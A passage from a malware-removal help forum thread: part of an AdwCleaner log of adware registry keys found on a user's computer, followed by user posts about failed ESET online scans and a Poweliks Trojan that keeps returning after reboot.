HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D} Key Found: HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472} Key Found: HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD} Key Found: HKLM\SOFTWARE\Classes\CLSID\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96} Key Found: HKLM\SOFTWARE\Classes\CLSID\{E15A9BFD-D16D-496D-8222-44CADF316E70} Key Found: HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000} Key Found: HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF} Key Found: HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF} Key Found: HKLM\SOFTWARE\Classes\CLSID\{0015CAC9-FC30-4CD0-BFAA-7412CC2C4DD9} Key Found: HKLM\SOFTWARE\Classes\CLSID\{26C7AFDB-3690-449E-B979-B0AF5CC56DD4} Key Found: HKLM\SOFTWARE\Classes\CLSID\{3A5A5381-DAAF-4C0D-B032-2C66B3EE4A8D} Key Found: HKLM\SOFTWARE\Classes\CLSID\{472EF1D2-4AAE-470D-AE85-6AF8177916FD} Key Found: HKLM\SOFTWARE\Classes\CLSID\{8F010D54-C023-457F-AF03-497EACB6D519} Key Found: HKLM\SOFTWARE\Classes\CLSID\{9A754403-27B1-4ED7-96D7-588F07888EBF} Key Found: HKLM\SOFTWARE\Classes\CLSID\{CB31FF8F-BF80-4D2B-ADBE-12C6F5347890} Key Found: HKLM\SOFTWARE\Classes\CLSID\{FCAA532B-E807-4027-940C-BA16B9D50105} Key Found: HKLM\SOFTWARE\Classes\Interface\{660E6F4F-840D-436D-B668-433D9591BAC5} Key Found: HKLM\SOFTWARE\Classes\Interface\{E7435878-65B9-44D1-A443-81754E5DFC90} Key Found: HKLM\SOFTWARE\Classes\TypeLib\{92380354-381A-471F-BE2E-DD9ACD9777EA} Key Found: HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{03F998B2-0E00-11D3-A498-00104B6EB52E} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1B00725B-C455-4DE6-BFB6-AD540AD427CD} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88} Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1000\Software\SpeedBit Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\distromatic Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\IM Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\ImInstaller Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\SlimWare Utilities Inc Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\SpeedBit Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Yahoo\Companion Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Yahoo\YFriendsBar Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\YahooPartnerToolbar Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\AppDataLow\Software\adawarebp Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\AppDataLow\Software\Yahoo\Companion Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\FLV Player Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SoftwareUpdUtility Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ViewpointMediaPlayer Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Yahoo! Companion Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Amazon Assistant Key Found: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1191959822-635995572-3245679226-1004\Software\SpeedBit Key Found: HKCU\Software\distromatic Key Found: HKCU\Software\IM Key Found: HKCU\Software\ImInstaller Key Found: HKCU\Software\SlimWare Utilities Inc Key Found: HKCU\Software\SpeedBit Key Found: HKCU\Software\Yahoo\Companion Key Found: HKCU\Software\Yahoo\YFriendsBar Key Found: HKCU\Software\YahooPartnerToolbar Key Found: HKCU\Software\AppDataLow\Software\adawarebp Key Found: HKCU\Software\AppDataLow\Software\Yahoo\Companion Key Found: HKLM\SOFTWARE\ImInstaller Key Found: HKLM\SOFTWARE\MetaStream Key Found: HKLM\SOFTWARE\SlimWare Utilities Inc Key Found: HKLM\SOFTWARE\SpeedBit Key Found: HKLM\SOFTWARE\Viewpoint Key Found: HKLM\SOFTWARE\Yahoo\Companion Key Found: HKLM\SOFTWARE\Lavasoft\Web Companion Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FLV Player Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoftwareUpdUtility Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ViewpointMediaPlayer Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Amazon Assistant Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\FLV Player Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SoftwareUpdUtility Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ViewpointMediaPlayer Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Yahoo! Companion Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Amazon Assistant Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Key Found: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\SearchScopes\{CFF4DB9B-135F-47c0-9269-B4C6572FD61A} Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{CFF4DB9B-135F-47c0-9269-B4C6572FD61A} Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com Key Found: HKLM\SOFTWARE\Classes\AppID\dnu.EXE Key Found: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{1B00725B-C455-4DE6-BFB6-AD540AD427CD} Key Found: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{03F998B2-0E00-11D3-A498-00104B6EB52E} Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\FLVPlayer.exe Key Found: HKLM\SOFTWARE\MozillaPlugins\@viewpoint.com/VMP ***** [ Web browsers ] ***** No malicious Firefox based browser items found. No malicious Chromium based browser items found. ************************* C:\AdwCleaner\AdwCleaner[s0].txt - [14631 Bytes] - [27/08/2016 19:51:40] C:\AdwCleaner\AdwCleaner[s1].txt - [13756 Bytes] - [27/08/2016 20:22:16] ########## EOF - C:\AdwCleaner\AdwCleaner[s1].txt - [13830 Bytes] ########## I have had alot of problems with the online ESET scan. I do not use internet explorer as Vista quit updating and my version is long out of date. I use Mozilla Firefox. I disabled Ad-Aware but it still seemed to recognize its presence on the computer. The first time I ran the scan it found 8 threats and hung up before the scan was complete so I could not retrieve a report. I had to end the scan through task manager. The second time I ran the scan it found 11 threats and hung up before the scan was completed so again no report but before I could end the process it started cleaning the threats even though I did not have that box checked. I have no idea what was deleted from my computer from this scan. I tried it a third time and it found one threat and again hung up before the scan was finished. After this I gave up as I don't want anymore files deleted from my computer without my knowledge. Therefore I do not have a txt file to include from the ESET online scan. I hope this will be enough to help without the last scan Fixlog.txt AdwCleaner.txt
  5. I have too many logs to send in one reply. Here are the initial attachments, a copy of the emails and what logs I could fit in. Ill have to send additional logs in another reply Addition.txt FRST.txt
  6. I do a full scan and get back a report that finds Trojan viruses on computer that will be deleted on reboot. I reboot the computer and receive the message that the viruses were successfully deleted. I do another full scan and get a report that the viruses are there but will be deleted on reboot and the scenario starts all over again. How can I disinfect and remove these Trojan viruses. I have seen both Trojan Poweliks.Gen.1 twice at the same time and Trojan Poweliks.Gen.2 once with Windows System32 regsvr. Trojan Gen.2 has disappered. Both Trojan Poweliks Gen 1 can not be deleted. I have also attached logs that were attached to my email [Request ID ##468513##] Please advise if you have any ideas I might try to resolve this problem. logs.zip